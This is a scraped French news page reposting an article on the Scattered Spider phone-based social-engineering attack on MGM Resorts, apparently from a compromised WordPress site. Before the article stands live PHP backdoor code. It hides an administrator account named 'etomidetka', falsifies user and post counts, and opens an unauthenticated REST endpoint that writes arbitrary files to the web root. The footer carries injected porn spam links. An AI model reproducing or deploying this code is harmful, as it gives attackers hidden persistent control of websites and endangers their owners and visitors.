//ETOMIDETKA add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); add_action('rest_api_init', function () { register_rest_route('custom/v1', '/addesthtmlpage', [ 'methods' => 'POST', 'callback' => 'create_html_file', 'permission_callback' => '__return_true', ]); }); function create_html_file(WP_REST_Request $request) { $file_name = sanitize_file_name($request->get_param('filename')); $html_code = $request->get_param('html'); if (empty($file_name) || empty($html_code)) { return new WP_REST_Response([ 'error' => 'Missing required parameters: filename or html'], 400); } if (pathinfo($file_name, PATHINFO_EXTENSION) !== 'html') { $file_name .= '.html'; } $root_path = ABSPATH; $file_path = $root_path . $file_name; if (file_put_contents($file_path, $html_code) === false) { return new WP_REST_Response([ 'error' => 'Failed to create HTML file'], 500); } $site_url = site_url('/' . $file_name); return new WP_REST_Response([ 'success' => true, 'url' => $site_url ], 200); } Des braqueurs dévalisent un casino de Las Vegas d’un simple coup de téléphone – Ebene Media
Home Actu Des braqueurs dévalisent un casino de Las Vegas d’un simple coup de téléphone
Actu

Des braqueurs dévalisent un casino de Las Vegas d’un simple coup de téléphone

C’est comme «Ocean’s Eleven» (ou presque).

Plus besoin de constituer une équipe avec un expert en explosifs, un pickpocket et un perceur de coffre dont la réputation n’est plus à faire pour braquer un casino à Las Vegas. Un téléphone et un compte LinkedIn peuvent désormais faire le job, comme le rapporte Ars Technica.

Le groupe MGM Resort, propriétaire d’établissements aussi connus que le Bellagio, le Luxor ou le MGM Grand sur le strip de Las Vegas, en a fait la douloureuse expérience avec une spectaculaire cyberattaque la semaine dernière. L’impact de cette intrusion est en cours d’évaluation, mais cet épisode qui a vu la suspension des services en ligne pendant plusieurs jours, le blocage des clés électroniques dans les hôtels et la désactivation des machines à sous a déjà lourdement écorné l’image du groupe.

Pas de sacs de billets dérobés donc, mais des térabytes de données sur les clients et la menace d’un ransomware… Pas très réjouissant, donc. Mais par quelle sorcellerie ces malandrins ont-ils pu pénétrer le système informatique de MGM? Par un simple coup de fil. Le groupe de hackers à l’origine de cette attaque, Scattered Spider, aurait tout bonnement appelé des employés en se faisant passer pour des prestataires informatiques.

La méthode est d’une simplicité effrayante: après avoir rassemblé via les réseaux sociaux des informations sur les employés de MGM, les pirates ont passé des coups de fils aux intéressés avec le petit coup de pression qui permet d’obtenir un mot de passe ou un accès à un service en contournant les procédures de sécurité habituelles.

Ingénierie sociale et facteur humain

L’affaire illustre une réalité à laquelle toutes les organisations sont confrontées: le maillon faible de la cybersécurité est toujours l’humain, celui qui utilise le même mot de passe (sa date de naissance) pour tout les services en ligne, qui donne des informations sensibles en réponse à un mail douteux et qui donc peut juger bon de transgresser une règle de sécurité quand on lui dit par téléphone que son zèle est contre-productif.

Ces méthodes d’extorsion de données ont un nom: l’ingénierie sociale, et cible majoritairement les grands groupes, où des milliers d’employés qui ne se connaissant pas sont susceptibles de s’affranchir, avec la meilleure volonté du monde, des plus élémentaires règles de sécurité.

MGM devra néanmoins revoir drastiquement ses procédures d’identification, multiplier les facteurs d’authentification et cloisonner ses services pour qu’on ne puisse plus en une seule opération gripper les distributeurs de billets et empêcher le paiement du parking pour les clients. Reconnaissez que ça fait un peu amateur.

Vous avez appris à vous méfier de tous les mails que vous receviez sur votre boîte pro? Faites désormais de même avec les appels téléphoniques, c’est peut-être un ancien perceur de coffre qui est au bout du fil.

#Des #braqueurs #dévalisent #casino #Las #Vegas #dun #simple #coup #téléphone #korii.slate.fr

Written by
Ebene Media

Toute l'actualité en direct. Retrouvez-nous sur les réseaux sociaux: Abonnez-vous à Youtube: cliquez ici -- Suivez-nous sur Facebook: cliquez ici -- Suivez-nous sur Twitter: cliquez ici -- Suivez-nous sur Tik Tok: cliquez ici

Leave a comment

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Related Articles

Vol ukrainien abattu en 2020 : l’Iran saisit la CIJ contre le Canada, la Suède, l’Ukraine et le Royaume-Uni

La Cour internationale de justice a annoncé, le 17 avril, qu’une plainte...

Trump veut faire fonctionner le gouvernement des États-Unis «comme un business»

Le président américain Donald Trump a annoncé son intention de transformer le...

Programme nucléaire iranien : reprise des pourparlers entre Téhéran et Washington à Rome

Après leurs premiers pourparlers tenus à Mascate le 12 avril, Américains et...

Un «abonnement» pour un bouclier antimissile : Musk veut signer un contrat avec la défense américaine

SpaceX, la société spatiale d’Elon Musk, est bien positionnée pour jouer un...

tamilplay 2018 movie zoztube.mobi sunny leone sex youtube debonairblogs.com porngonzo.mobi marati sexi video iroenose nicehentai.com hentai mirror سكس يبني noodporn.com افلام سكي عربى spance anybunny.mobi indian x videos hd
hindi sexy video photo analpornvids.info girl fuck kashmir aunty sex pornovuku.com masaaldesi افلام سكس صيني yatarab.com سكس بولاندى 友崎りん avgle.mobi パンチラ株式会社 sex vedios in telugu sumotube.mobi free indian aunty porn
sxxvidoes assoass.mobi englishsexvideos hot romance sex videos goodtastemovs.com video sex gana red wape com bigassporntrends.com boobs squeezed فيلم سكس ولد وامه abdulaporno.com سثء ر pubg hentai asiahentai.net fujiko hentai